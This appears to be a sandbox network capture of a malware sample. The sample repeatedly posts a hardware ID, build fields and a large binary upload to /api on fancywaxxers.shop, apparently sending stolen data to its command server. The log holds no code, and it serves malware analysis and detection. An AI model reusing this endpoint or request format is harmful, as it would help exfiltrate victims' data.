2025-01-03 14:21:17 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HMJYF5Z9ZC3F1LL6AAD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19969 Host: fancywaxxers.shop
2025-01-03 14:21:17 UTC	15331	OUT	Data Raw: 2d 2d 48 4d 4a 59 46 35 5a 39 5a 43 33 46 31 4c 4c 36 41 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 33 35 46 37 33 45 46 35 30 41 45 46 35 35 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 48 4d 4a 59 46 35 5a 39 5a 43 33 46 31 4c 4c 36 41 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 4d 4a 59 46 35 5a 39 5a 43 33 46 31 4c 4c 36 41 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 Data Ascii: --HMJYF5Z9ZC3F1LL6AADContent-Disposition: form-data; name="hwid"8035F73EF50AEF55822D1F4978021086--HMJYF5Z9ZC3F1LL6AADContent-Disposition: form-data; name="pid"3--HMJYF5Z9ZC3F1LL6AADContent-Disposition: form-data; name="lid"PsFKDg--pa
2025-01-03 14:21:17 UTC	4638	OUT	Data Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 Data Ascii: +?2+?2+?o?Mp5p
2025-01-03 14:21:18 UTC	1135	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=65r1v73f462cueniti022tokv8; expires=Tue, 29 Apr 2025 08:07:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMWqZpq4E9NnFE15fMuKnvlKeEkRg9ivqsnz27aRXD0hNry1l1HkDxvOt%2BCA9lwuJN3nJqFuyuhGABj6%2F00RDnL73An31pjueEX94tFRzCc924MpNSVLU%2Basx7Dx%2FChE72NfUw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc3a26adee1424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1589&rtt_var=601&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2843&recv_bytes=20933&delivery_rate=1811414&cwnd=248&unsent_bytes=0&cid=0559581442e73be0&ts=615&x=0"
2025-01-03 14:21:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 14:21:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-03 14:21:19 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AQ64EA56SQSZA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 954 Host: fancywaxxers.shop
2025-01-03 14:21:19 UTC	954	OUT	Data Raw: 2d 2d 41 51 36 34 45 41 35 36 53 51 53 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 33 35 46 37 33 45 46 35 30 41 45 46 35 35 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 41 51 36 34 45 41 35 36 53 51 53 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 51 36 34 45 41 35 36 53 51 53 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 41 51 36 34 45 41 35 36 53 51 53 Data Ascii: --AQ64EA56SQSZAContent-Disposition: form-data; name="hwid"8035F73EF50AEF55822D1F4978021086--AQ64EA56SQSZAContent-Disposition: form-data; name="pid"1--AQ64EA56SQSZAContent-Disposition: form-data; name="lid"PsFKDg--pablo--AQ64EA56SQS
2025-01-03 14:21:19 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cj5np7eavhellvdk1sr3do4m7d; expires=Tue, 29 Apr 2025 08:07:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izXQn8bkGYSlNxaJ7I9UCUY0tYtw95cu9phswgrf5KfJsCqC3rsSpHiztqhGickRapJQIrbMmyJZqomnuv6LyOos5zkhSUCZ66PdlenGDH2DcF%2Fo0udGGrl1dRTcqZBX8CcXvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc3a274dd3dc34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1502&rtt_var=584&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1866&delivery_rate=1944074&cwnd=181&unsent_bytes=0&cid=c37e7859cc8c4059&ts=468&x=0"
2025-01-03 14:21:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 14:21:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-03 14:21:20 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=K6BD9O2NH6L0I1C User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569891 Host: fancywaxxers.shop
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: 2d 2d 4b 36 42 44 39 4f 32 4e 48 36 4c 30 49 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 33 35 46 37 33 45 46 35 30 41 45 46 35 35 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 4b 36 42 44 39 4f 32 4e 48 36 4c 30 49 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 36 42 44 39 4f 32 4e 48 36 4c 30 49 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 36 42 44 39 Data Ascii: --K6BD9O2NH6L0I1CContent-Disposition: form-data; name="hwid"8035F73EF50AEF55822D1F4978021086--K6BD9O2NH6L0I1CContent-Disposition: form-data; name="pid"1--K6BD9O2NH6L0I1CContent-Disposition: form-data; name="lid"PsFKDg--pablo--K6BD9
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: 01 64 ba 10 41 03 fd f5 08 ff 39 dc 20 3b b4 a5 b2 5c 36 3b a1 db b5 d1 fb 99 e1 02 47 4d 75 84 e5 b9 f1 d2 00 e7 cd d2 ff ee 2b f8 ff be 64 00 7a 45 37 98 c5 81 44 0b 6a 31 17 b0 6b 7f 2d 67 32 6d 32 47 63 7d 53 d8 25 14 bf 6d 28 de 4e 4a c8 c1 38 78 2b ce dc b9 e7 57 d3 93 1b 10 01 17 d3 b2 9d 3d 71 a0 4d 99 f7 87 05 3a 7e 5b 9e 73 35 a4 a4 01 53 b7 09 2a 75 68 01 9b 6f 33 23 93 de 99 b3 c5 fa e4 e8 2e 3c 28 6e 34 22 e5 c9 e2 94 06 ff bb 6e 32 b5 ce 4a 51 7b 18 56 60 55 02 3b 0f fe 8f ca 2a 4c f9 59 cc 1c 05 89 09 82 dc 95 b9 cd 2e e2 3c d2 8a 72 03 77 31 c7 37 54 53 98 4c a2 21 5e 47 78 43 6e e5 53 08 6c bc ad f4 41 a4 29 16 f6 ff 09 ad 6d c5 a9 9a dd b1 0e ab 54 76 80 c8 13 cd 8d 9d 69 9d fc 09 f3 ab 75 75 f6 31 41 17 da d3 a3 ad 22 23 be e0 8e ef a6 Data Ascii: dA9 ;\6;GMu+dzE7Dj1k-g2m2Gc}S%m(NJ8x+W=qM:~[s5Suho3#.<(n4"n2JQ{V`U;LY.<rw17TSL!^GxCnSlA)mTviuu1A"#
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: 44 d2 96 43 60 ee e6 a2 a4 f8 84 58 07 e4 ba 1a b1 a9 32 2c eb 04 cb 87 21 cc 22 ad 66 cd ab cc 3a f7 71 73 d1 a7 a3 b7 33 7e 3d ae 66 51 a1 ed 77 99 9d c5 7f 0d 76 1b 0b c0 5a c5 8e 18 51 a6 53 1e 1a c9 f7 ad a2 9a 4d a9 f7 b9 b2 17 19 12 9b c3 9a 01 b8 4b e6 ec 60 41 b2 10 3f 94 04 5e 7e 8f 7e a2 5a 66 48 cf dd d1 62 bc b1 fd a8 6a d2 1c 22 ef aa ad 73 58 d9 9d d8 c7 db 90 60 bb 0a ec 18 e2 92 52 76 aa fa f3 cb d8 d1 48 a6 7a e9 50 ba 98 59 2b 43 1e 9a 34 6a 24 b7 e8 35 51 92 96 f5 ff 02 4b e1 98 24 05 b5 49 11 2a 81 7d e3 e3 81 63 37 07 f0 f6 39 49 60 29 33 94 34 f3 44 98 34 35 bd 3a f1 86 52 cb af d8 9b 5e da a3 bf 31 7d 9c 8a c4 16 c2 16 15 f2 d5 93 32 4e 0e f6 ab 16 53 0f bb 04 cd e1 48 93 41 35 c8 91 ce 72 ac 75 f8 19 5e c6 ba 41 3c 68 f2 43 9d 87 Data Ascii: DC`X2,!"f:qs3~=fQwvZQSMK`A?^~~ZfHbj"sX`RvHzPY+C4j$5QK$I*}c79I`)34D45:R^1}2NSHA5ru^A<hC
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: e0 c5 de b7 7a 6e b3 69 dd b9 8d 77 4c f2 02 3f f0 2a 56 a6 8b 8c 7f 1d 7a d7 5f 2e 96 6f 71 8f 60 7c 06 66 3e a6 85 4d 6b b4 30 fe 36 d8 99 59 df f1 13 63 74 85 b8 a5 cb c0 62 f2 b5 15 9c ef 7e d7 94 e8 d0 38 33 56 f1 b0 22 ed 91 be f8 df e4 ba d6 ea aa 22 1b 4e de df 72 82 e9 2f 73 cd 47 be 77 4f b5 ff 1b 1e a8 43 54 3d 26 f5 61 0e dc 3f b6 3f 76 72 45 9b 4d ad fe 72 2a 6d 21 b8 71 2d b6 ec 8b e1 f5 f1 3b 6b 46 53 7c c7 69 a9 a1 ac dc ab 7f 9d d8 f4 fe 64 a8 40 0b 71 fc fa 2d 76 63 6a 41 d6 0a 5f 38 b3 50 95 90 7e 2e 74 be 3f cc e1 53 7d f5 df ee 72 3f e5 5a 2f b6 72 aa c6 22 44 52 03 fd 07 59 6a 32 3e cb 13 6b 2f bd 97 4f 9b f0 81 f6 25 4e cc 2c c3 de 11 ab 54 71 40 51 75 98 d6 fe 6b b8 67 3f a7 93 c3 0a 55 70 5f fe 9a 8b f6 7f aa c1 bb 22 a5 72 8a d7 Data Ascii: zniwL?Vz_.oq`\|f>Mk06Yctb~83V""Nr/sGwOCT=&a??vrEMrm!q-;kFS\|id@q-vcjA_8P~.t?S}r?Z/r"DRYj2>k/O%N,Tq@Qukg?Up_"r
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: d2 27 69 ae d6 0e 6f 0c cc 71 99 a5 60 46 8f 4c d6 8b db 55 83 41 82 f0 bb d5 a8 22 e7 34 b1 38 fd 46 1a b4 60 85 31 0e 42 8c f5 60 4f 5c a1 31 9d 00 ba f0 85 f1 9b d3 8a 86 a2 b7 7a 53 f2 23 e9 1d 79 86 4a 18 ee af 82 e7 9b 48 cf 6b 07 e5 cf f3 41 35 04 70 be 59 ec 09 8b 3a c1 ec cb 29 48 db ea 11 de fd e8 91 b3 a8 fb d8 27 0f 93 15 a0 44 ea 0a 08 8d 7a 29 9b 85 2f c2 86 76 ef b2 e1 c2 48 c8 75 ab b3 58 d2 83 7c 25 3b 42 f3 df 7e 64 ab 81 a2 a6 a0 92 55 f4 af 93 e4 78 01 81 3f 73 ac 94 6b 73 b9 6b bc b5 fe ca 1a 17 b0 fb 6d fa 40 04 54 d0 6a ea 8a 2e b5 f1 ef 5d 3d 77 61 e1 e4 79 bf a4 45 9b 63 15 bf dc 8f bd 63 9a 9f 77 7e 44 27 2f f0 fc 67 ee d3 b1 af cc 7d 19 4d 37 4a 86 f9 fe 7f e7 ec ba 24 28 fd c5 83 54 82 79 90 19 03 cb ce bf 14 64 54 95 d3 d2 5a Data Ascii: 'ioq`FLUA"48F`1B`O\1zS#yJHkA5pY:)H'Dz)/vHuX\|%;B~dUx?skskm@Tj.]=wayEccw~D'/g}M7J$(TydTZ
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: bd 02 42 9c a6 39 5e b9 a8 28 1f e2 ee 36 e9 92 c9 4b c2 46 4d 60 30 79 cb 09 66 4e d0 48 50 9d c9 89 07 94 06 ab 02 e3 70 8f 7c 58 49 70 f1 7d c0 a4 c3 3c fe c8 0b 91 06 a7 a8 df b2 47 88 1f 12 cc 6d c3 bc 38 ef d9 a5 c5 72 2d 0f 36 cd cb a7 8d 26 e9 25 ff ce 8a a3 cc 5d 22 2f 50 6f 76 ee 3a 69 c8 70 fa 50 7b 27 55 71 99 a1 9b 49 2f 11 35 ba 12 32 fb 95 5c 17 54 ac 53 fb 53 44 4d 25 ee 83 3d ac 8b f5 f3 02 1f b1 89 4e e7 31 19 a6 7a 25 78 17 4d fc da a1 a3 61 8e 47 12 87 48 a7 c6 66 28 d3 5a b5 62 75 be ef 73 ee ee 1d 90 78 fc 86 aa b5 4d e4 8d 28 c2 ec cd d7 b5 1a 08 3f 02 20 95 31 3f ac 93 cf a0 f4 b0 8d f3 4f 94 01 bd cc 9c 4b 45 be 32 8a 50 78 34 71 3a 6a f3 76 80 86 5a 33 72 1b 7b f3 a3 c4 47 fa 4a 4d 92 12 3f 38 ac ab 5e 68 c9 42 c2 1e 18 38 1e 0b Data Ascii: B9^(6KFM`0yfNHPp\|XIp}<Gm8r-6&%]"/Pov:ipP{'UqI/52\TSSDM%=N1z%xMaGHf(ZbusxM(? 1?OKE2Px4q:jvZ3r{GJM?8^hB8
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: c3 2a 37 7a 83 2f 85 d1 d2 a3 0a b4 d8 47 b8 1b a3 41 64 06 3d cc c7 8f a4 a2 c6 d5 82 20 42 bc 4a 25 da 24 ed 30 78 38 ef 14 b0 f5 b6 71 86 3c 3d f9 e3 f0 9a c2 cb d9 c8 65 2d 72 c2 10 7a 23 27 50 6e b0 52 07 0a 7b c2 25 a1 a4 d7 b4 51 b8 7b e7 b4 9f 72 57 30 c8 25 3c 81 0b fe fb c4 81 f0 3e 12 63 28 26 5a 66 99 a8 32 c6 7d 1d 8a 0a 0d 3f ca 08 e5 6a 11 86 19 62 8b 0c eb a3 ae d7 8d ac 9c 30 5b 51 0b d8 9f e7 e8 53 2c 8b 04 a7 97 81 1e 66 2a d9 b3 95 3b 3c 6b fd 49 95 2b 12 53 6a b5 65 e8 38 11 d7 86 d2 2d 51 a8 4e fc 11 a5 48 30 ac 59 8b 8b 18 47 8e 5d e3 6f e8 f1 b1 bf 82 37 b0 72 1e b2 70 42 6c 0c 8b 7f 64 f8 91 93 70 08 43 ac c5 6c 62 cf bd 35 7b c5 f0 e0 23 7b 16 6f c8 4d e4 79 36 91 4b b6 2f 43 2f 9a 8c 54 17 38 26 66 46 5d 91 2e ab 03 12 7d c1 9b Data Ascii: 7z/GAd= BJ%$0x8q<=e-rz#'PnR{%Q{rW0%<>c(&Zf2}?jb0[QS,f;<kI+Sje8-QNH0YG]o7rpBldpClb5{#{oMy6K/C/T8&fF].}
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: be b3 fb 32 e5 d4 a6 92 27 e0 70 bc 81 52 a5 00 13 4d 90 f7 65 c3 82 03 1e 73 dc 98 be 86 7b 24 9f 32 78 d4 e0 5c 4e 6c fa b9 61 d6 ed b7 48 67 99 c2 63 0d 85 90 60 79 d4 ca fd ed e4 e4 a8 f2 90 7e 62 d1 97 da d7 2c eb a9 9b 4d 29 6e ea fc f4 fc c8 2b 61 29 07 63 fa 96 8d 5b 16 bf 20 ff 0e d2 1d 9b d5 a3 07 b1 44 07 31 61 14 19 66 dc 98 4b 53 2f 17 f9 ae e3 46 7c 7b 9b c7 04 e8 1a d5 5c df 03 c4 36 a0 13 0b 77 fe 36 5b 66 0c 9c 17 bd be b9 ca b0 5c 56 d4 13 b5 b3 cb 26 66 89 80 15 55 a2 97 d7 98 c4 8f ca ba f6 c0 59 08 ae 7a 9c 64 49 56 ef 11 b8 3f 02 8d fd 46 c0 36 fa b5 6c 63 c6 1e 20 98 65 da 8d 88 4f 17 e7 39 49 96 9c 92 c7 3f 8b d4 34 c4 2f e8 c3 f5 4b 7c e0 4b 64 41 c5 1d 38 54 f8 08 2d 41 15 d8 cd fc 1d 7f c6 ee c8 c1 77 fe 87 38 cb af 8f 1f b7 cd Data Ascii: 2'pRMes{$2x\NlaHgc`y~b,M)n+a)c[ D1afKS/F\|{\6w6[f\V&fUYzdIV?F6lc eO9I?4/K\|KdA8T-Aw8
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: 24 fb 2e 92 2b 5f 7e d6 f5 1f 19 75 e8 9c 6f b6 46 21 c2 d8 63 0b b9 4b ca 18 50 3c 67 08 11 e8 e9 5a 4c 73 0a 0a b1 f9 73 12 38 ef 49 71 ab f1 41 5f 35 73 5a 8c 56 13 72 0d 00 d1 4f a8 66 4e cc 78 6f 50 af 48 9b de ac 0f 22 d2 88 34 3d a5 2d 1a bf 3b 49 92 f7 a6 8f 86 06 ca bf 72 2f 44 64 57 3f 08 97 ca 61 21 f9 9a 38 e6 8a 8e f5 62 88 f7 d3 65 63 bc 93 23 f4 61 be 57 0b f9 9e 03 9c 9e 22 38 d4 07 a5 e7 4f e8 b4 f2 3c bc 12 96 79 7a 0f 1b 08 04 73 71 bc 9b 35 b5 8a 40 f2 08 95 ca 66 a6 57 20 e6 ef af 42 df c4 e2 fa 43 7d c1 8b be b9 33 1d 4d 2e e8 d0 9e dd e4 f5 c6 63 b8 32 86 ab 42 61 63 48 3f 36 4e f7 93 6c 6a 98 0c 40 4c d7 72 9e ee c0 24 8f f2 31 67 51 4b f5 c1 61 c4 c6 f0 db b6 3b 2d ca ec 88 d4 e1 81 b5 93 a4 5b a1 82 d9 46 27 cb 35 75 94 cb 75 2c Data Ascii: $.+_~uoF!cKP<gZLss8IqA_5sZVrOfNxoPH"4=-;Ir/DdW?a!8bec#aW"8O<yzsq5@fW BC}3M.c2BacH?6Nlj@Lr$1gQKa;-[F'5uu,
2025-01-03 14:21:20 UTC	15331	OUT	Data Raw: 0b e1 65 28 24 ba ce 7e eb e2 78 2a 76 73 1f 2a 57 95 1c 33 e5 f7 c0 cf 0c c4 f8 58 0c c0 b1 eb 27 31 48 6d ec 91 56 3e 5f bd 72 47 9f 15 6e a9 1e 66 70 00 08 cf bf dd ea ae 35 aa ad c9 90 e0 6c 07 2f a6 04 0a 11 6c 72 d7 e8 3d 23 fc 9e 33 8f 27 7c 8b 38 7b c5 2c b9 f5 c1 1d f2 f2 6e 47 58 53 a0 ac 3b 4e 3a c0 da 63 b9 41 50 bd 0d 45 76 90 40 31 dd 45 61 4a 98 3f 76 13 bd 3a a2 f1 29 3c 6f 74 e6 62 a1 3b 94 e1 ec a9 2c e1 09 d3 5c e5 66 cc 7b a2 3f a9 b9 55 47 84 c4 70 f6 29 c4 fa c5 20 79 b2 c6 48 82 cf 86 dd 60 cd 33 81 d4 3f ee 03 f4 58 50 f7 27 4b 95 41 fc 1a 17 6f 10 66 50 c6 0e 90 6b 65 49 9f 70 31 31 08 c1 65 a6 fb e1 26 07 59 ec f1 e5 53 9f 70 10 e0 9f f5 76 ff 2c 9f bd 71 f8 cc cd 15 41 f0 66 af 4d 5f f4 b5 d3 c9 36 02 cc 04 73 86 81 ee 16 7e 53 Data Ascii: e($~xvsW3X'1HmV>_rGnfp5l/lr=#3'\|8{,nGXS;N:cAPEv@1EaJ?v:)<otb;,\f{?UGp) yH`3?XP'KAofPkeIp11e&YSpv,qAfM_6s~S
2025-01-03 14:21:22 UTC	1139	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=is3jaof6f4si3ekhbk5q2c9pes; expires=Tue, 29 Apr 2025 08:08:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zOXFTioK8hZv0Y9UeNyr5lXDMwNRNo5BKgvqwujfW6S%2BQZz8oGwzuTimtyBr%2B9yTaz740lHLg1pBdeZC2v1AN18pHNrDf0%2BpF%2BTAlN8AvvlIIJdLAXUY1sPE94YgJ9FESAtsBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc3a27daafa43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1576&rtt_var=606&sent=197&recv=586&lost=0&retrans=0&sent_bytes=2844&recv_bytes=572436&delivery_rate=1781574&cwnd=203&unsent_bytes=0&cid=e7965aa48e855792&ts=1579&x=0"